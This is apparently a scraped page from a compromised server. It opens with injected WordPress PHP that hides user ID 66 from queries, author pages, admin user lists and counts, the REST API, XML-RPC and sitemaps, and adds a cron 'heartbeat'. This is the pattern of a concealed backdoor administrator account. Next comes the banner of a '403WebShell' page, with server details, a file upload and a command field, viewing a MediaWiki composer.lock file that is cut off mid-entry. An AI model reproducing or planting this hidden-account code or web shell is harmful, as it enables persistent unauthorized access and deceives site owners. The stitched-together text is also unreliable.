add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/html/openusability/wiki/vendor/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/openusability/wiki/vendor/composer.lock
{
    "_readme": [
        "This file locks the dependencies of your project to a known state",
        "Read more about it at https://getcomposer.org/doc/01-basic-usage.md#composer-lock-the-lock-file",
        "This file is @generated automatically"
    ],
    "hash": "d4b69794468f794a8350339881319948",
    "content-hash": "fbadb58818d15bd051e858b533bf2252",
    "packages": [
        {
            "name": "composer/semver",
            "version": "1.4.0",
            "source": {
                "type": "git",
                "url": "https://github.com/composer/semver.git",
                "reference": "84c47f3d8901440403217afc120683c7385aecb8"
            },
            "dist": {
                "type": "zip",
                "url": "https://api.github.com/repos/composer/semver/zipball/84c47f3d8901440403217afc120683c7385aecb8",
                "reference": "84c47f3d8901440403217afc120683c7385aecb8",
                "shasum": ""
            },
            "require": {
                "php": "^5.3.2 || ^7.0"
            },
            "require-dev": {
                "phpunit/phpunit": "^4.5 || ^5.0.5",
                "phpunit/phpunit-mock-objects": "2.3.0 || ^3.0"
            },
            "type": "library",
            "extra": {
                "branch-alias": {
                    "dev-master": "1.x-dev"
                }
            },
            "autoload": {
                "psr-4": {
                    "Composer\\Semver\\": "src"
                }
            },
            "notification-url": "https://packagist.org/downloads/",
            "license": [
                "MIT"
            ],
            "authors": [
                {
                    "name": "Nils Adermann",
                    "email": "naderman@naderman.de",
                    "homepage": "http://www.naderman.de"
                },
                {
                    "name": "Jordi Boggiano",
                    "email": "j.boggiano@seld.be",
                    "homepage": "http://seld.be"
                },
                {
                    "name": "Rob Bast",
                    "email": "rob.bast@gmail.com",
                    "homepage": "http://robbast.nl"
                }
            ],
            "description": "Semver library that offers utilities, version constraint parsing and validation.",
            "keywords": [
                "semantic",
                "semver",
                "validation",
                "versioning"
            ],
            "time": "2016-03-30 13:16:03"
        },
        {
            "name": "cssjanus/cssjanus",
            "version": "v1.1.2",
            "source": {
                "type": "git",
                "url": "https://github.com/cssjanus/php-cssjanus.git",
                "reference": "b7efe237794856acec641cb82dcd6613c1aba2b4"
            },
            "dist": {
                "type": "zip",
                "url": "https://api.github.com/repos/cssjanus/php-cssjanus/zipball/b7efe237794856acec641cb82dcd6613c1aba2b4",
                "reference": "b7efe237794856acec641cb82dcd6613c1aba2b4",
                "shasum": ""
            },
            "require": {
                "php": ">=5.3.3"
            },
            "require-dev": {
                "jakub-onderka/php-parallel-lint": "0.8.*",
                "phpunit/phpunit": "3.7.*",
                "squizlabs/php_codesniffer": "2.3.*"
            },
            "type": "library",
            "autoload": {
                "psr-0": {
                    "": "src/"
                }
            },
            "notification-url": "https://packagist.org/downloads/",
            "license": [
                "Apache-2.0"
            ],
            "description": "Convert CSS stylesheets between left-to-right and right-to-left.",
            "time": "2015-06-15 17:20:16"
        },
        {
            "name": "firebase/php-jwt",
            "version": "v3.0.0",
            "source": {
                "type": "git",
                "url": "https://github.com/firebase/php-jwt.git",
                "reference": "fa8a06e96526eb7c0eeaa47e4f39be59d21f16e1"
            },
            "dist": {
                "type": "zip",
                "url": "https://api.github.com/repos/firebase/php-jwt/zipball/fa8a06e96526eb7c0eeaa47e4f39be59d21f16e1",
                "reference": "fa8a06e96526eb7c0eeaa47e4f39be59d21f16e1",
                "shasum": ""
            },
            "require": {
                "php": ">=5.3.0"
            },
            "type": "library",
            "autoload": {
                "psr-4": {
                    "Firebase\\JWT\\": "src"
                }
            },
            "notification-url": "https://packagist.org/downloads/",
            "license": [
                "BSD-3-Clause"
            ],
            "authors": [
                {
                    "name": "Neuman Vong",
                    "email": "neuman+pear@twilio.com",
                    "role": "Developer"
                },
                {
                    "name": "Anant Narayanan",
                    "email": "anant@php.net",
                    "role": "Developer"
                }
            ],
            "description": "A simple library to encode and decode JSON Web Tokens (JWT) in PHP. Should conform to the current spec.",
            "homepage": "https://github.com/firebase/php-jwt",
            "time": "2015-07-22 18:31:08"
        },
        {
            "name": "justinrainbow/json-schema",
            "version": "1.6.1",
            "source": {
                "type": "git",
                "url": "https://github.com/justinrainbow/json-schema.git",
                "reference": "cc84765fb7317f6b07bd8ac78364747f95b86341"
            },
            "dist": {
                "type": "zip",
                "url": "https://api.github.com/repos/justinrainbow/json-schema/zipball/cc84765fb7317f6b07bd8ac78364747f95b86341",
                "reference": "cc84765fb7317f6b07bd8ac78364747f95b86341",
                "shasum": ""
            },
            "require": {
                "php": ">=5.3.29"
            },
            "require-dev": {
                "json-schema/json-schema-test-suite": "1.1.0",
                "phpdocumentor/phpdocumentor": "~2",
                "phpunit/phpunit": "~3.7"
            },
            "bin": [
                "bin/validate-json"
            ],
            "type": "library",
            "extra": {
                "branch-alias": {
                    "dev-master": "1.6.x-dev"
                }
            },
            "autoload": {
                "psr-4": {
                    "JsonSchema\\": "src/JsonSchema/"
                }
            },
            "notification-url": "https://packagist.org/downloads/",
            "license": [
                "BSD-3-Clause"
            ],
            "authors": [
                {
                    "name": "Bruno Prieto Reis",
                    "email": "bruno.p.reis@gmail.com"
                },
                {
                    "name": "Justin Rainbow",
                    "email": "justin.rainbow@gmail.com"
                },
                {
                    "name": "Igor Wiedler",
                    "email": "igor@wiedler.ch"
                },
                {
                    "name": "Robert Schönthal",
                    "email": "seroscho@googlemail.com"
                }
            ],
            "description": "A library to validate a json schema.",
            "homepage": "https://github.com/justinrainbow/json-schema",
            "keywords": [
                "json",
                "schema"
            ],
            "time": "2016-01-25 15:43:01"
        },
        {
            "name": "liuggio/statsd-php-client",
            "version": "v1.0.18",
            "source": {
                "type": "git",
                "url": "https://github.com/liuggio/statsd-php-client.git",
                "reference": "c42e6d6687b7b2d7683186ec7f4f03351cc3dbca"
            },
            "dist": {
                "type": "zip",
                "url": "https://api.github.com/repos/liuggio/statsd-php-client/zipball/c42e6d6687b7b2d7683186ec7f4f03351cc3dbca",
                "reference": "c42e6d6687b7b2d7683186ec7f4f03351cc3dbca",
                "shasum": ""
            },
            "require": {
                "php": ">=5.3.2"
            },
            "require-dev": {
                "monolog/monolog": ">=1.2.0",
                "phpunit/phpunit": "^4.7"
            },
            "suggest": {
                "monolog/monolog": "Monolog, in order to do generate statistic from log >=1.2.0)"
            },
            "type": "library",
            "autoload": {
                "psr-0": {
                    "Liuggio": "src/"
                }
            },
            "notification-url": "https://packagist.org/downloads/",
            "license": [
                "MIT"
            ],
            "authors": [
                {
                    "name": "Giulio De Donato",
                    "email": "liuggio@gmail.com"
                }
            ],
            "description": "Statsd (Object Oriented) client library for PHP",
            "homepage": "https://github.com/liuggio/statsd-php-client/",
            "keywords": [
                "etsy",
                "monitoring",
                "php",
                "statsd"
            ],
            "time": "2015-07-23 23:12:45"
        },
        {
            "name": "mediawiki/at-ease",
            "version": "v1.1.0",
            "source": {
                "type": "git",
                "url": "https://github.com/wikimedia/at-ease.git",
                "reference": "94c0b84888841d160419f915c2745d9d08fbf0c3"
            },
            "dist": {
                "type": "zip",
                "url": "https://api.github.com/repos/wikimedia/at-ease/zipball/94c0b84888841d160419f915c2745d9d08fbf0c3",
                "reference": "94c0b84888841d160419f915c2745d9d08fbf0c3",
                "shasum": ""
            },
            "require": {
                "php": ">=5.3.3"
            },
            "require-dev": {
                "jakub-onderka/php-parallel-lint": "0.9",
                "mediawiki/mediawiki-codesniffer": "0.3.0",
                "phpunit/phpunit": "~4.5",
                "squizlabs/php_codesniffer": "2.3.0"
            },
            "type": "library",
            "autoload": {
                "files": [
                    "src/Functions.php"
                ]
            },
            "notification-url": "https://packagist.org/downloads/",
            "license": [
                "GPL-2.0+"
            ],
            "authors": [
                {
                    "name": "Tim Starling",
                    "email": "tstarling@wikimedia.org"
                },
                {
                    "name": "MediaWiki developers",
                    "email": "wikitech-l@lists.wikimedia.org"
                }
            ],
            "description": "Safe replacement to @ for suppressing warnings.",
            "homepage": "https://www.mediawiki.org/wiki/at-ease",
            "time": "2015-09-18 07:02:06"
        },
        {
            "name": "monolog/monolog",
            "version": "1.18.2",
            "source": {
                "type": "git",
                "url": "https://github.com/Seldaek/monolog.git",
                "reference": "064b38c16790249488e7a8b987acf1c9d7383c09"
            },
            "dist": {
                "type": "zip",
                "url": "https://api.github.com/repos/Seldaek/monolog/zipball/064b38c16790249488e7a8b987acf1c9d7383c09",
                "reference": "064b38c16790249488e7a8b987acf1c9d7383c09",
                "shasum": ""
            },
            "require": {
                "php": ">=5.3.0",
                "psr/log": "~1.0"
            },
            "provide": {
                "psr/log-implementation": "1.0.0"
            },
            "require-dev": {
                "aws/aws-sdk-php": "^2.4.9",
                "doctrine/couchdb": "~1.0@dev",
                "graylog2/gelf-php": "~1.0",
                "jakub-onderka/php-parallel-lint": "0.9",
                "php-amqplib/php-amqplib": "~2.4",
                "php-console/php-console": "^3.1.3",
                "phpunit/phpunit": "~4.5",
                "phpunit/phpunit-mock-objects": "2.3.0",
                "raven/raven": "^0.13",
                "ruflin/elastica": ">=0.90 <3.0",
                "swiftmailer/swiftmailer": "~5.3"
            },
            "suggest": {
                "aws/aws-sdk-php": "Allow sending log messages to AWS services like DynamoDB",
                "doctrine/couchdb": "Allow sending log messages to a CouchDB server",
                "ext-amqp": "Allow sending log messages to an AMQP server (1.0+ required)",
                "ext-mongo": "Allow sending log messages to a MongoDB server",
                "graylog2/gelf-php": "Allow sending log messages to a GrayLog2 server",
                "mongodb/mongodb": "Allow sending log messages to a MongoDB server via PHP Driver",
                "php-amqplib/php-amqplib": "Allow sending log messages to an AMQP server using php-amqplib",
                "php-console/php-console": "Allow sending log messages to Google Chrome",
                "raven/raven": "Allow sending log messages to a Sentry server",
                "rollbar/rollbar": "Allow sending log messages to Rollbar",
                "ruflin/elastica": "Allow sending log messages to an Elastic Search server"
            },
            "type": "library",
            "extra": {
                "branch-alias": {
                    "dev-master": "2.0.x-dev"
                }
            },
            "autoload": {
                "psr-4": {
                    "Monolog\\": "src/Monolog"
                }
            },
            "notification-url": "https://packagist.org/downloads/",
            "license": [
                "MIT"
            ],
            "authors": [
                {
                    "name": "Jordi Boggiano",
                    "email": "j.boggiano@seld.be",
                    "homepage": "http://seld.be"
                }
            ],
            "description": "Sends your logs to files, sockets, inboxes, databases and various web services",
            "homepage": "http://github.com/Seldaek/monolog",
            "keywords": [
                "log",
                "logging",
                "psr-3"
            ],
            "time": "2016-04-02 13:12:58"
        },
        {
            "name": "nmred/kafka-php",
            "version": "v0.1.5",
            "source": {
                "type": "git",
                "url": "https://github.com/nmred/kafka-php.git",
                "reference": "317ad8c208684db8b9e6d2f5bf7f471e89a8b4eb"
            },
            "dist": {
                "type": "zip",
                "url": "https://api.github.com/repos/nmred/kafka-php/zipball/317ad8c208684db8b9e6d2f5bf7f471e89a8b4eb",
                "reference": "317ad8c208684db8b9e6d2f5bf7f471e89a8b4eb",
                "shasum": ""
            },
            "require": {
                "php": ">=5.3.3"
            },
            "require-dev": {
                "phpunit/phpcov": "*",
                "phpunit/phpunit": "~4.0",
                "satooshi/php-coveralls": "dev-master"
            },
            "type": "library",
            "autoload": {
                "psr-0": {
                    "Kafka\\": "src/"
                }
            },
            "notification-url": "https://packagist.org/downloads/",
            "license": [
                "BSD-3-Clause"
            ],
            "description": "Kafka client for php",
            "homepage": "http://www.swanlinux.net",
            "keywords": [
                "client",
                "kafka"
            ],
            "time": "2015-12-02 12:06:23"
        },
        {
            "name": "oojs/oojs-ui",
            "version": "v0.17.1",
            "source": {
                "type": "git",
                "url": "https://github.com/wikimedia/oojs-ui.git",
                "reference": "ca52adc5c0191eb278baa2bcb50d30b2bd7b0af3"
            },
            "dist": {
                "type": "zip",
                "url": "https://api.github.com/repos/wikimedia/oojs-ui/zipball/ca52adc5c0191eb278baa2bcb50d30b2bd7b0af3",
                "reference": "ca52adc5c0191eb278baa2bcb50d30b2bd7b0af3",
                "shasum": ""
            },
            "require": {
                "mediawiki/at-ease": "1.1.0",
                "php": ">=5.5.9"
            },
            "require-dev": {
                "jakub-onderka/php-parallel-lint": "0.9.2",
                "mediawiki/mediawiki-codesniffer": "0.6.0",
                "phpunit/phpunit": "4.8.21"
            },
            "type": "library",
            "autoload": {
                "classmap": [
                    "php/"
                ]
            },
            "notification-url": "https://packagist.org/downloads/",
            "license": [
                "MIT"
            ],
            "authors": [
                {
                    "name": "Timo Tijhof",
                    "email": "krinklemail@gmail.com"
                },
                {
                    "name": "Bartosz Dziewoński",
                    "email": "matma.rex@gmail.com"
                },
                {
                    "name": "Ed Sanders",
                    "email": "esanders@wikimedia.org"
                },
                {
                    "name": "James D. Forrester",
                    "email": "jforrester@wikimedia.org"
                },
                {
                    "name": "Kirsten Menger-Anderson",
                    "email": "kmenger@wikimedia.org"
                },
                {
                    "name": "Rob Moen",
                    "email": "rmoen@wikimedia.org"
                },
                {
                    "name": "Roan Kattouw",
                    "email": "roan@wikimedia.org"
                },
                {
                    "name": "Trevor Parscal",
                    "email": "trevor@wikimedia.org"
                },
                {
                    "name": "Kunal Mehta",
                    "email": "legoktm@gmail.com"
                },
                {
                    "name": "Prateek Saxena",
                    "email": "prtksxna@gmail.com"
                }
            ],
            "description": "Provides library of common widgets, layouts, and windows.",
            "homepage": "https://www.mediawiki.org/wiki/OOjs_UI",
            "time": "2016-05-03 22:34:48"
        },
        {
            "name": "oyejorge/less.php",
            "version": "v1.7.0.10",
            "source": {
                "type": "git",
                "url": "https://github.com/oyejorge/less.php.git",
                "reference": "a1e2d3c20794b37ac4d0baeb24613e579584033b"
            },
            "dist": {
                "type": "zip",
                "url": "https://api.github.com/repos/oyejorge/less.php/zipball/a1e2d3c20794b37ac4d0baeb24613e579584033b",
                "reference": "a1e2d3c20794b37ac4d0baeb24613e579584033b",
                "shasum": ""
            },
            "require": {
                "php": ">=5.3"
            },
            "require-dev": {
                "phpunit/phpunit": "~4.8.18"
            },
            "bin": [
                "bin/lessc"
            ],
            "type": "library",
            "autoload": {
                "psr-0": {
                    "Less": "lib/"
                },
                "classmap": [
                    "lessc.inc.php"
                ]
            },
            "notification-url": "https://packagist.org/downloads/",
            "license": [
                "Apache-2.0"
            ],
            "authors": [
                {
                    "name": "Matt Agar",
                    "homepage": "https://github.com/agar"
                },
                {
                    "name": "Martin Jantošovič",
                    "homepage": "https://github.com/Mordred"
                },
                {
                    "name": "Josh Schmidt",
                    "homepage": "https://github.com/oyejorge"
                }
            ],
            "description": "PHP port of the Javascript version of LESS http://lesscss.org",
            "homepage": "http://lessphp.gpeasy.com",
            "keywords": [
                "css",
                "less",
                "less.js",
                "lesscss",
                "php",
                "stylesheet"
            ],
            "time": "2015-12-30 05:47:36"
        },
        {
            "name": "pear/console_getopt",
            "version": "v1.4.1",
            "source": {
                "type": "git",
                "url": "https://github.com/pear/Console_Getopt.git",
                "reference": "82f05cd1aa3edf34e19aa7c8ca312ce13a6a577f"
            },
            "dist": {
                "type": "zip",
                "url": "https://api.github.com/repos/pear/Console_Getopt/zipball/82f05cd1aa3edf34e19aa7c8ca312ce13a6a577f",
                "reference": "82f05cd1aa3edf34e19aa7c8ca312ce13a6a577f",
                "shasum": ""
            },
            "type": "library",
            "autoload": {
                "psr-0": {
                    "Console": "./"
                }
            },
            "notification-url": "https://packagist.org/downloads/",
            "include-path": [
                "./"
            ],
            "license": [
                "BSD-2-Clause"
            ],
            "authors": [
                {
                    "name": "Greg Beaver",
                    "email": "cellog@php.net",
                    "role": "Helper"
                },
                {
                    "name": "Andrei Zmievski",
                    "email": "andrei@php.net",
                    "role": "Lead"
                },
                {
                    "name": "Stig Bakken",
                    "email": "stig@php.net",
                    "role": "Developer"
                }
            ],
            "description": "More info available on: http://pear.php.net/package/Console_Getopt",
            "time": "2015-07-20 20:28:12"
        },
        {
            "name": "pear/mail",
            "version": "1.3.0",
            "source": {
                "type": "git",
                "url": "https://github.com/pear/Mail.git",
                "reference": "8a7305cb507b460e03e55e0ac84c67c8358c9b44"
            },
            "dist": {
                "type": "zip",
                "url": "https://api.github.com/repos/pear/Mail/zipball/8a7305cb507b460e03e55e0ac84c67c8358c9b44",
                "reference": "8a7305cb507b460e03e55e0ac84c67c8358c9b44",
                "shasum": ""
            },
            "require": {
                "pear/pear-core-minimal": "*",
                "php": ">=5.2.1"
            },
            "require-dev": {
                "pear/pear": "*"
            },
            "suggest": {
                "pear/net_smtp": "Install optionally via your project's composer.json"
            },
            "type": "library",
            "autoload": {
                "psr-0": {
                    "Mail": "./"
                }
            },
            "notification-url": "https://packagist.org/downloads/",
            "include-path": [
                "./"
            ],
            "license": [
                "BSD-2-Clause"
            ],
            "authors": [
                {
                    "name": "Chuck Hagenbuch",
                    "email": "chuck@horde.org",
                    "role": "Lead"
                },
                {
                    "name": "Richard Heyes",
                    "email": "richard@phpguru.org",
                    "role": "Developer"
                },
                {
                    "name": "Aleksander Machniak",
                    "email": "alec@alec.pl",
                    "role": "Developer"
                }
            ],
            "description": "Class that provides multiple interfaces for sending emails.",
            "homepage": "http://pear.php.net/package/Mail",
            "time": "2016-01-31 21:32:18"
        },
        {
            "name": "pear/mail_mime",
            "version": "1.10.0",
            "source": {
                "type": "git",
                "url": "https://github.com/pear/Mail_Mime.git",
                "reference": "e071727cf41a4b85ecc1de210ed4fd7f4f8d1ec4"
            },
            "dist": {
                "type": "zip",
                "url": "https://api.github.com/repos/pear/Mail_Mime/zipball/e071727cf41a4b85ecc1de210ed4fd7f4f8d1ec4",
                "reference": "e071727cf41a4b85ecc1de210ed4fd7f4f8d1ec4",
                "shasum": ""
            },
            "require": {
                "pear/pear-core-minimal": "*"
            },
            "type": "library",
            "autoload": {
                "psr-0": {
                    "Mail": "./"
                }
            },
            "notification-url": "https://packagist.org/downloads/",
            "include-path": [
                "./"
            ],
            "license": [
                "BSD Style"
            ],
            "authors": [
                {
                    "name": "Cipriano Groenendal",
                    "email": "cipri@php.net",
                    "role": "Lead"
                },
                {
                    "name": "Aleksander Machniak",
                    "email": "alec@php.net",
                    "role": "Lead"
                }
            ],
            "description": "Mail_Mime provides classes to create MIME messages",
            "homepage": "http://pear.php.net/package/Mail_Mime",
            "time": "2015-09-13 12:42:41"
        },
        {
            "name": "pear/mail_mime-decode",
            "version": "1.5.5.2",
            "source": {
                "type": "git",
                "url": "https://github.com/dreamfactorysoftware/Mail_mimeDecode.git",
                "reference": "a53c1ce051b212e23f7f67ea8d31015640de1129"
            },
            "dist": {
                "type": "zip",
                "url": "https://api.github.com/repos/dreamfactorysoftware/Mail_mimeDecode/zipball/a53c1ce051b212e23f7f67ea8d31015640de1129",
                "reference": "a53c1ce051b212e23f7f67ea8d31015640de1129",
                "shasum": ""
            },
            "require": {
                "pear/pear_exception": "*"
            },
            "require-dev": {
                "phpunit/phpunit": "*"
            },
            "type": "library",
            "autoload": {
                "psr-0": {
                    "Mail_mimeDecode": ""
                }
            },
            "notification-url": "https://packagist.org/downloads/",
            "include-path": [
                "./"
            ],
            "license": [
                "BSD-2-Clause"
            ],
            "authors": [
                {
                    "name": "Cipriano Groenendal",
                    "email": "cipri@php.net",
                    "role": "Lead"
                },
                {
                    "name": "Aleksander Machniak",
                    "email": "alec@php.net",
                    "role": "Lead"
                }
            ],
            "description": "More info available on: http://pear.php.net/package/Mail_mimeDecode",
            "time": "2014-04-15 19:29:16"
        },
        {
            "name": "pear/net_smtp",
            "version": "1.7.1",
            "source": {
                "type": "git",
                "url": "https://github.com/pear/Net_SMTP.git",
                "reference": "cf7e1bac4cdd38f3260e5c10d5ae366b7e22794c"
            },
            "dist": {
                "type": "zip",
                "url": "https://api.github.com/repos/pear/Net_SMTP/zipball/cf7e1bac4cdd38f3260e5c10d5ae366b7e22794c",
                "reference": "cf7e1bac4cdd38f3260e5c10d5ae366b7e22794c",
                "shasum": ""
            },
            "require": {
                "pear/net_socket": "*",
                "pear/pear-core-minimal": "*",
                "php": ">=5.4.0"
            },
            "require-dev": {
                "phpunit/phpunit": "*"
            },
            "suggest": {
                "pear/auth_sasl": "Install optionally via your project's composer.json"
            },
            "type": "library",
            "autoload": {
                "psr-0": {
                    "Net": "./"
                }
            },
            "notification-url": "https://packagist.org/downloads/",
            "include-path": [
                "./"
            ],
            "license": [
                "PHP License"
            ],
            "authors": [
                {
                    "name": "Jon Parise",
                    "email": "jon@php.net",
                    "homepage": "http://www.indelible.org",
                    "role": "Lead"
                },
                {
                    "name": "Chuck Hagenbuch",
                    "email": "chuck@horde.org",
                    "role": "Lead"
                }
            ],
            "description": "An implementation of the SMTP protocol",
            "homepage": "http://pear.github.io/Net_SMTP/",
            "keywords": [
                "email",
                "mail",
                "smtp"
            ],
            "time": "2015-09-07 17:04:16"
        },
        {
            "name": "pear/net_socket",
            "version": "1.0.14",
            "source": {
                "type": "git",
                "url": "https://github.com/pear/Net_Socket.git",
                "reference": "fcd33efd77e4b35ce85489141ab9145343579fe8"
            },
            "dist": {
                "type": "zip",
                "url": "https://api.github.com/repos/pear/Net_Socket/zipball/fcd33efd77e4b35ce85489141ab9145343579fe8",
                "reference": "fcd33efd77e4b35ce85489141ab9145343579fe8",
                "shasum": ""
            },
            "require": {
                "pear/pear_exception": "*"
            },
            "require-dev": {
                "phpunit/phpunit": "*"
            },
            "type": "library",
            "autoload": {
                "psr-0": {
                    "Net": "./"
                }
            },
            "notification-url": "https://packagist.org/downloads/",
            "include-path": [
                "./"
            ],
            "license": [
                "PHP License"
            ],
            "authors": [
                {
                    "name": "Chuck Hagenbuch",
                    "email": "chuck@horde.org",
                    "role": "Lead"
                },
                {
                    "name": "Aleksander Machniak",
                    "email": "alec@php.net",
                    "role": "Lead"
                },
                {
                    "name": "Stig Bakken",
                    "email": "stig@php.net",
                    "role": "Lead"
                }
            ],
            "description": "More info available on: http://pear.php.net/package/Net_Socket",
            "time": "2014-02-20 19:27:06"
        },
        {
            "name": "pear/pear-core-minimal",
            "version": "v1.10.1",
            "source": {
                "type": "git",
                "url": "https://github.com/pear/pear-core-minimal.git",
                "reference": "cae0f1ce0cb5bddb611b0a652d322905a65a5896"
            },
            "dist": {
                "type": "zip",
                "url": "https://api.github.com/repos/pear/pear-core-minimal/zipball/cae0f1ce0cb5bddb611b0a652d322905a65a5896",
                "reference": "cae0f1ce0cb5bddb611b0a652d322905a65a5896",
                "shasum": ""
            },
            "require": {
                "pear/console_getopt": "~1.3",
                "pear/pear_exception": "~1.0"
            },
            "replace": {
                "rsky/pear-core-min": "self.version"
            },
            "type": "library",
            "autoload": {
                "psr-0": {
                    "": "src/"
                }
            },
            "notification-url": "https://packagist.org/downloads/",
            "include-path": [
                "src/"
            ],
            "license": [
                "BSD-3-Clause"
            ],
            "authors": [
                {
                    "name": "Christian Weiske",
                    "email": "cweiske@php.net",
                    "role": "Lead"
                }
            ],
            "description": "Minimal set of PEAR core files to be used as composer dependency",
            "time": "2015-10-17 11:41:19"
        },
        {
            "name": "pear/pear_exception",
            "version": "v1.0.0",
            "source": {
                "type": "git",
                "url": "https://github.com/pear/PEAR_Exception.git",
                "reference": "8c18719fdae000b690e3912be401c76e406dd13b"
            },
            "dist": {
                "type": "zip",
                "url": "https://api.github.com/repos/pear/PEAR_Exception/zipball/8c18719fdae000b690e3912be401c76e406dd13b",
                "reference": "8c18719fdae000b690e3912be401c76e406dd13b",
                "shasum": ""
            },
            "require": {
                "php": ">=4.4.0"
            },
            "require-dev": {
                "phpunit/phpunit": "*"
            },
            "type": "class",
            "extra": {
                "branch-alias": {
                    "dev-master": "1.0.x-dev"
                }
            },
            "autoload": {
                "psr-0": {
                    "PEAR": ""
                }
            },
            "notification-url": "https://packagist.org/downloads/",
            "include-path": [
                "."
            ],
            "license": [
                "BSD-2-Clause"
            ],
            "authors": [
                {
                    "name": "Helgi Thormar",
                    "email": "dufuz@php.net"
                },
                {
                    "name": "Greg Beaver",
                    "email": "cellog@php.net"
                }
            ],
            "description": "The PEAR Exception base class.",
            "homepage": "https://github.com/pear/PEAR_Exception",
            "keywords": [
                "exception"
            ],
            "time": "2015-02-10 20:07:52"
        },
        {
            "name": "psr/log",
            "version": "1.0.0",
            "source": {
                "type": "git",
                "url": "https://github.com/php-fig/log.git",
                "reference": "fe0936ee26643249e916849d48e3a51d5f5e278b"
            },
            "dist": {
                "type": "zip",
                "url": "https://api.github.com/repos/php-fig/log/zipball/fe0936ee26643249e916849d48e3a51d5f5e278b",
                "reference": "fe0936ee26643249e916849d48e3a51d5f5e278b",
                "shasum": ""
            },
            "type": "library",
            "autoload": {
                "psr-0": {
                    "Psr\\Log\\": ""
                }
            },
            "notification-url": "https://packagist.org/downloads/",
            "license": [
                "MIT"
            ],
            "authors": [
                {
                    "name": "PHP-FIG",
                    "homepage": "http://www.php-fig.org/"
                }
            ],
            "description": "Common interface for logging libraries",
            "keywords": [
                "log",
                "psr",
                "psr-3"
            ],
            "time": "2012-12-21 11:40:51"
        },
        {
            "name": "ruflin/elastica",
            "version": "2.3.1",
            "source": {
                "type": "git",
                "url": "https://github.com/ruflin/Elastica.git",
                "reference": "0df1d7b513960ba11d3075652dcd71fcab8dd37a"
            },
            "dist": {
                "type": "zip",
                "url": "https://api.github.com/repos/ruflin/Elastica/zipball/0df1d7b513960ba11d3075652dcd71fcab8dd37a",
                "reference": "0df1d7b513960ba11d3075652dcd71fcab8dd37a",
                "shasum": ""
            },
            "require": {
                "php": ">=5.3.3",
                "psr/log": "~1.0"
            },
            "require-dev": {
                "guzzlehttp/guzzle": "5.3.*",
                "munkie/elasticsearch-thrift-php": "1.4.*"
            },
            "suggest": {
                "egeloen/http-adapter": "Allow using httpadapter transport",
                "guzzlehttp/guzzle": "Allow using guzzle 5.3.x as the http transport (Requires php 5.4)",
                "monolog/monolog": "Logging request",
                "munkie/elasticsearch-thrift-php": "Allow using thrift transport"
            },
            "type": "library",
            "extra": {
                "branch-alias": {
                    "dev-master": "2.2.x-dev"
                }
            },
            "autoload": {
                "psr-4": {
                    "Elastica\\": "lib/Elastica/"
                }
            },
            "notification-url": "https://packagist.org/downloads/",
            "license": [
                "MIT"
            ],
            "authors": [
                {
                    "name": "Nicolas Ruflin",
                    "homepage": "http://ruflin.com/"
                }
            ],
            "description": "Elasticsearch Client",
            "homepage": "http://elastica.io/",
            "keywords": [
                "client",
                "search"
            ],
            "time": "2015-10-19 07:09:10"
        },
        {
            "name": "symfony/process",
            "version": "v3.0.4",
            "source": {
                "type": "git",
                "url": "https://github.com/symfony/process.git",
                "reference": "e6f1f98bbd355d209a992bfff45e7edfbd4a0776"
            },
            "dist": {
                "type": "zip",
                "url": "https://api.github.com/repos/symfony/process/zipball/e6f1f98bbd355d209a992bfff45e7edfbd4a0776",
                "reference": "e6f1f98bbd355d209a992bfff45e7edfbd4a0776",
                "shasum": ""
            },
            "require": {
